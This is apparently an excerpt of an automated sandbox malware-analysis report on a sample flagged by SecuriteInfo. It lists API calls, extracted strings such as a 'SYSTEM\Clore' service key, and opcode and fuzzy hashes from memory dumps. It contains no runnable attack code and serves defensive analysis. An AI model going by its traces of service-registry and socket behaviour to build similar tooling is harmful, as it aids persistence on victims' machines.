                                • Opcode ID: cbe06174bd6aac11f6c13d9fb466caa794eeed53098024cf062ca083bddc16a9
                                • Instruction ID: 079047525932690ec442193298d2657af37b39bf66693d53a759155d639cf5d3
                                • Opcode Fuzzy Hash: cbe06174bd6aac11f6c13d9fb466caa794eeed53098024cf062ca083bddc16a9
                                • Instruction Fuzzy Hash: AE117C74D1430DEFCB11EFA8D8496AEBBB1AF88300F108429E905A7390D6749B85CF91
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 1000AB36
                                  • Part of subcall function 1000AA91: ___BuildCatchObjectHelper.LIBCMT ref: 1000AAC7
                                • _UnwindNestedFrames.LIBCMT ref: 1000AB4D
                                • ___FrameUnwindToState.LIBCMT ref: 1000AB5B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                • String ID: csm$csm
                                • API String ID: 2163707966-3733052814
                                • Opcode ID: c1a4990adaeceab18058c8c9dd134bd8e376356a5595d37914c7354d310c9c04
                                • Instruction ID: 4000dc2618aba6950dfc466ead1abeeb8ad126e9fa6b98f8ee535260b8bf58f5
                                • Opcode Fuzzy Hash: c1a4990adaeceab18058c8c9dd134bd8e376356a5595d37914c7354d310c9c04
                                • Instruction Fuzzy Hash: A301E43540114ABBEF129E51CC45EAB7FAAFF0A3D0F108214BD181516AE736E9B1DBA1
                                APIs
                                • GlobalFlags.KERNEL32(00000000), ref: 0072DC62
                                • GlobalFlags.KERNEL32(00000000), ref: 0072DC87
                                • GlobalUnlock.KERNEL32(00000000), ref: 0072DCA9
                                • GlobalFree.KERNEL32(00000000), ref: 0072DCB5
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp, xrefs: 0072DC74
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$Flags$FreeUnlock
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp
                                • API String ID: 3690484993-1334628715
                                • Opcode ID: 788a9666d12c3144b1ff0be30d243cbf41743cebf1fe96e7f694115d9cd62228
                                • Instruction ID: 3debce342ba76ad6de75baf34fccc1567d979aae716d559b828d932e77b26997
                                • Opcode Fuzzy Hash: 788a9666d12c3144b1ff0be30d243cbf41743cebf1fe96e7f694115d9cd62228
                                • Instruction Fuzzy Hash: 75014476914209EFCB24DFA4D849AAD3B79EF40340F208024F905DB240DA78DE81EBA1
                                APIs
                                • _memset.LIBCMT ref: 10006008
                                • wsprintfA.USER32 ref: 10006019
                                • lstrlenA.KERNEL32(?,00000000), ref: 10006028
                                  • Part of subcall function 100076B0: LoadLibraryA.KERNEL32(ADVAPI32.dll,75920F00,\Services\%s,75921760,100090A8,10018BD0,000000FF), ref: 100076DF
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 100076F6
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10007701
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000770C
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10007717
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10007722
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000772C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad_memsetlstrlenwsprintf
                                • String ID: Clore$SYSTEM\Clore
                                • API String ID: 1126013741-3032097531
                                • Opcode ID: 1cea242696a82a618c82e75b5bd1c8eec7d939afc3695300a434b81a70019244
                                • Instruction ID: 54116d482a28800dcec0e5032cd45d93946b79217e9f71d3a9ea6d8b4edde5c4
                                • Opcode Fuzzy Hash: 1cea242696a82a618c82e75b5bd1c8eec7d939afc3695300a434b81a70019244
                                • Instruction Fuzzy Hash: 96F065B685022477E720EB548C4AFEA772CEB05759F444084FF087A182E776E79186F9
                                APIs
                                • SetLastError.KERNEL32(0000007F), ref: 006D1467
                                • __stricmp.LIBCMTD ref: 006D14BF
                                • SetLastError.KERNEL32(0000007F), ref: 006D14DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$__stricmp
                                • String ID:
                                • API String ID: 1281019135-0
                                • Opcode ID: bf24dcef80b9ee548421c8b4ddb67630a24864fb093efc96d4504b09bb0129e6
                                • Instruction ID: dd7ce9412a7aa65e56155705e52ea02adcdc01b479e65b3625add989b030e4bc
                                • Opcode Fuzzy Hash: bf24dcef80b9ee548421c8b4ddb67630a24864fb093efc96d4504b09bb0129e6
                                • Instruction Fuzzy Hash: D421F832B44204AFC720CF68E884AA973E6EB45325F1042AFEC4ACB351D775FD45CA91
                                APIs
                                • lstrlenA.KERNEL32(?), ref: 006D21DE
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 006D21F1
                                • _malloc.LIBCMTD ref: 006D2202
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_malloclstrlen
                                • String ID:
                                • API String ID: 2576735857-0
                                • Opcode ID: 10f6972ff765014d38778dcb80f5a8a38e0d2e052ea7821eb622b1872545c57d
                                • Instruction ID: 639706ef64e68e40e0d9197180d8f3506cf7e3d4e199c5d61354203479683ba8
                                • Opcode Fuzzy Hash: 10f6972ff765014d38778dcb80f5a8a38e0d2e052ea7821eb622b1872545c57d
                                • Instruction Fuzzy Hash: AA21E573A41206A7E7309B95AC49FEBB39DDB94320F10412BFD08DB340D6B59D5486F1
                                APIs
                                • InterlockedDecrement.KERNEL32(?), ref: 006E2D8C
                                • SysFreeString.OLEAUT32(00000000), ref: 006E2DA1
                                • SysAllocString.OLEAUT32(?), ref: 006E2DF2
                                • _com_issue_error.COMSUPPD ref: 006E2E08
                                • _com_issue_error.COMSUPPD ref: 006E2E21
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String_com_issue_error$AllocDecrementFreeInterlocked
                                • String ID:
                                • API String ID: 194195834-0
                                • Opcode ID: 75b846d81a46ea5d83079de8a7869aaa55431093db505b83f861cd41760d62c5
                                • Instruction ID: 17dfce6c2fdf0be26699a11a0cefd5239e771a869fc101068074de72f88ff705
                                • Opcode Fuzzy Hash: 75b846d81a46ea5d83079de8a7869aaa55431093db505b83f861cd41760d62c5
                                • Instruction Fuzzy Hash: 4B21D272A027969BD7209F26CC15B9BB7AEEF00B10F104629EC15DB380EB74D940CB90
                                APIs
                                • _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                • InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                • SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                • _com_issue_error.COMSUPPD ref: 006D2FD1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Convert_com_util::$DecrementFreeInterlocked_com_issue_error
                                • String ID:
                                • API String ID: 1965258213-0
                                • Opcode ID: 5f88f6549dddcbcc30650c5e9d6b8cf4dd3927e12ccba4aa1bd7161f56ee90c6
                                • Instruction ID: 1999c769a19f796a789617c871b6095d42326b08250b9a29f69f03274ed45cf8
                                • Opcode Fuzzy Hash: 5f88f6549dddcbcc30650c5e9d6b8cf4dd3927e12ccba4aa1bd7161f56ee90c6
                                • Instruction Fuzzy Hash: DB31AEB2D466229BD7309F55C810B9BF7B9EF60B10F144A2AE855A7380D774ED40CBD1
                                APIs
                                • EnterCriticalSection.KERNEL32(009E06A0), ref: 0072F0AF
                                • InitializeCriticalSection.KERNEL32(-009E04F7), ref: 0072F0CE
                                • LeaveCriticalSection.KERNEL32(009E06A0), ref: 0072F10D
                                • EnterCriticalSection.KERNEL32(-009E04F7), ref: 0072F11F
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterMessage$InitializeLeavePeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcrit.cpp
                                • API String ID: 2674801041-2928307776
                                • Opcode ID: 699399a9bc7c43ce980a8c4feb3157f5aca411f5bf97ae27a359e802eeefae35
                                • Instruction ID: 1186491d11f566298f0969d10056794717ff00addd458e7a8c87f4a4922d6cd1
                                • Opcode Fuzzy Hash: 699399a9bc7c43ce980a8c4feb3157f5aca411f5bf97ae27a359e802eeefae35
                                • Instruction Fuzzy Hash: B4318D74A10308EFDB24EFA4ED45B6D3B71EBD1791F108034E944AA291DBB8DAA0CE41
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Focus$Active
                                • String ID:
                                • API String ID: 2619150295-0
                                • Opcode ID: 79bfb1b272ac06da86fb6c4108afbd79ac1d1b573ef7ac139d7c37f9feca2d0a
                                • Instruction ID: d507c05996c1821f46b9684b4b5258fe5140c1a9ba4c0e221d48c91f4dc25bf5
                                • Opcode Fuzzy Hash: 79bfb1b272ac06da86fb6c4108afbd79ac1d1b573ef7ac139d7c37f9feca2d0a
                                • Instruction Fuzzy Hash: 80312975A1420DEBCB24DFA4C849BFE77B6EF44340F249169E6019B391CB349A41EB91
                                APIs
                                • _malloc.LIBCMT ref: 100087D2
                                  • Part of subcall function 10008730: __FF_MSGBANNER.LIBCMT ref: 10008749
                                  • Part of subcall function 10008730: __NMSG_WRITE.LIBCMT ref: 10008750
                                  • Part of subcall function 10008730: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,1000F48D,0000000C,00000001,0000000C,?,1000BA5C,00000018,10018E90,0000000C,1000BAEC), ref: 10008775
                                • _free.LIBCMT ref: 100087E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocHeap_free_malloc
                                • String ID:
                                • API String ID: 2734353464-0
                                • Opcode ID: 5ad8304720923e01a3e5886dcdec21748c5d2610062e955285554e4905134504
                                • Instruction ID: 38a9c2925aebf81b933cae76e5c1217f09147675ec67b5b69c23fe7021d1f261
                                • Opcode Fuzzy Hash: 5ad8304720923e01a3e5886dcdec21748c5d2610062e955285554e4905134504
                                • Instruction Fuzzy Hash: B911EB36408622EBF7119F349C4474E3B94FF442E0B61C435F9889A16ADF70DA418794
                                APIs
                                • FreeLibrary.KERNEL32(?,?,00000000,00000000,?,10006F9B,00000000,?,?,?,10005153,?), ref: 10006E35
                                • _free.LIBCMT ref: 10006E42
                                • VirtualFree.KERNEL32(5BC0335E,00000000,00008000,00000000,00000000,?,10006F9B,00000000,?,?,?,10005153,?), ref: 10006E59
                                • GetProcessHeap.KERNEL32(00000000,10006F9B,00000000,00000000,?,10006F9B,00000000,?,?,?,10005153,?), ref: 10006E62
                                • HeapFree.KERNEL32(00000000,?,10006F9B,00000000,?,?,?,10005153,?), ref: 10006E69
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Free$Heap$LibraryProcessVirtual_free
                                • String ID:
                                • API String ID: 3953351234-0
                                • Opcode ID: f9388c9485382152b1a9d1db94a82a6523a5d83b3c842423299ad20e4879461b
                                • Instruction ID: 2198454d914de4d086becf85c65e1c0cfcc012cd767a2d3f6d8b9facf2f26c1f
                                • Opcode Fuzzy Hash: f9388c9485382152b1a9d1db94a82a6523a5d83b3c842423299ad20e4879461b
                                • Instruction Fuzzy Hash: A911C275200750EBE220CF69CC84E1773EAFB88691B208529E1998B254C731F841CB60
                                APIs
                                • __getptd.LIBCMT ref: 1000CFA0
                                  • Part of subcall function 1000B30C: __getptd_noexit.LIBCMT ref: 1000B30F
                                  • Part of subcall function 1000B30C: __amsg_exit.LIBCMT ref: 1000B31C
                                • __getptd.LIBCMT ref: 1000CFB7
                                • __amsg_exit.LIBCMT ref: 1000CFC5
                                • __lock.LIBCMT ref: 1000CFD5
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 1000CFE9
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                • String ID:
                                • API String ID: 938513278-0
                                • Opcode ID: 6b225e5a4b7bd0a8959cfecaa67f81d789d26a63565aebe30f688295b60dd1e0
                                • Instruction ID: bbfbe52107bf7882bf94d8cf76dd8e6d52b9776cbe5b25399c35efd73f29cffc
                                • Opcode Fuzzy Hash: 6b225e5a4b7bd0a8959cfecaa67f81d789d26a63565aebe30f688295b60dd1e0
                                • Instruction Fuzzy Hash: E4F0B43A9447199BF721EB648803F5E33E2EF007E4F11416AF505A71DACB34AA81CB57
                                APIs
                                • setsockopt.WS2_32(?,0000FFFF,00000080,10003AC2,00000004), ref: 10001512
                                • CancelIo.KERNEL32(?), ref: 1000151C
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10001528
                                • closesocket.WS2_32(?), ref: 10001532
                                • SetEvent.KERNEL32(?), ref: 1000153C
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                • String ID:
                                • API String ID: 1486965892-0
                                • Opcode ID: e1d28e97204e576e4c36fe32126c89b143268dec3cdcb549ecc2359193f16db3
                                • Instruction ID: 3bbe414126f02e65abc3f73707456d1de7729262e55ae99efde05d8657ea76dd
                                • Opcode Fuzzy Hash: e1d28e97204e576e4c36fe32126c89b143268dec3cdcb549ecc2359193f16db3
                                • Instruction Fuzzy Hash: 30F03675110724EFD320DB99CC89E5A77B8EB49712F00864DF7468B6D0CAB2E944CBA0
                                APIs
                                  • Part of subcall function 10008623: _doexit.LIBCMT ref: 1000862F
                                • ___set_flsgetvalue.LIBCMT ref: 1000938C
                                  • Part of subcall function 1000B151: TlsGetValue.KERNEL32(7555B5F0,1000B2AA), ref: 1000B15A
                                  • Part of subcall function 1000B151: DecodePointer.KERNEL32 ref: 1000B16C
                                  • Part of subcall function 1000B151: TlsSetValue.KERNEL32(00000000), ref: 1000B17B
                                • ___fls_getvalue@4.LIBCMT ref: 10009397
                                  • Part of subcall function 1000B131: TlsGetValue.KERNEL32(?,?,1000939C,00000000), ref: 1000B13F
                                • ___fls_setvalue@8.LIBCMT ref: 100093AA
                                  • Part of subcall function 1000B185: DecodePointer.KERNEL32(?,?,?,100093AF,00000000,?,00000000), ref: 1000B196
                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 100093B3
                                • ExitThread.KERNEL32 ref: 100093BA
                                • GetCurrentThreadId.KERNEL32 ref: 100093C0
                                • __freefls@4.LIBCMT ref: 100093E0
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                • String ID:
                                • API String ID: 781180411-0
                                • Opcode ID: 89f33373eab5662a87f5960f2c926acb1f3282d08f69ec7e9a691b5124804a6c
                                • Instruction ID: 2be2344d41fddcacf163782a8128a1a8fddaa8841965bff33b54fd493dae8fe3
                                • Opcode Fuzzy Hash: 89f33373eab5662a87f5960f2c926acb1f3282d08f69ec7e9a691b5124804a6c
                                • Instruction Fuzzy Hash: 50E04F79800E55B7FB01AFF18C2A9CF3A5CEF052C0B858810F900A311ADB35EA1147A1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: @$AfxFrameOrView100sd$AfxMDIFrame100sd
                                • API String ID: 2102423945-2756322376
                                • Opcode ID: 869717eb3459a7c3d571ad133167447a4b96179468a0774693bf115287295018
                                • Instruction ID: d72f43c4ed6ee506bbe64bd76c6fa520fc6e48561f950222ec7c837d7eaa3f17
                                • Opcode Fuzzy Hash: 869717eb3459a7c3d571ad133167447a4b96179468a0774693bf115287295018
                                • Instruction Fuzzy Hash: 36C128B5D20209EFDB14DF94C886BEEBBF5BB44310F108A18E554AB2C4D7B8A654CF90
                                APIs
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • _memset.LIBCMT ref: 007327AF
                                • _memset.LIBCMT ref: 007327FD
                                • _memset.LIBCMT ref: 0073296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$Message$PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_b.cpp
                                • API String ID: 3936486738-1749028953
                                • Opcode ID: 0d693fe644c3e4d77639db16e7ea31039128bb53be66f4412bf27d0a53eb9e26
                                • Instruction ID: 24eeb06d61b68df564a5baaf110d4099a11a177372e26585fd251d23e0e5ea80
                                • Opcode Fuzzy Hash: 0d693fe644c3e4d77639db16e7ea31039128bb53be66f4412bf27d0a53eb9e26
                                • Instruction Fuzzy Hash: DDB1C9B4A00109EBDB04CF94C585A9DB7F2BF88314F24C559E914AB382D776EE82CF91
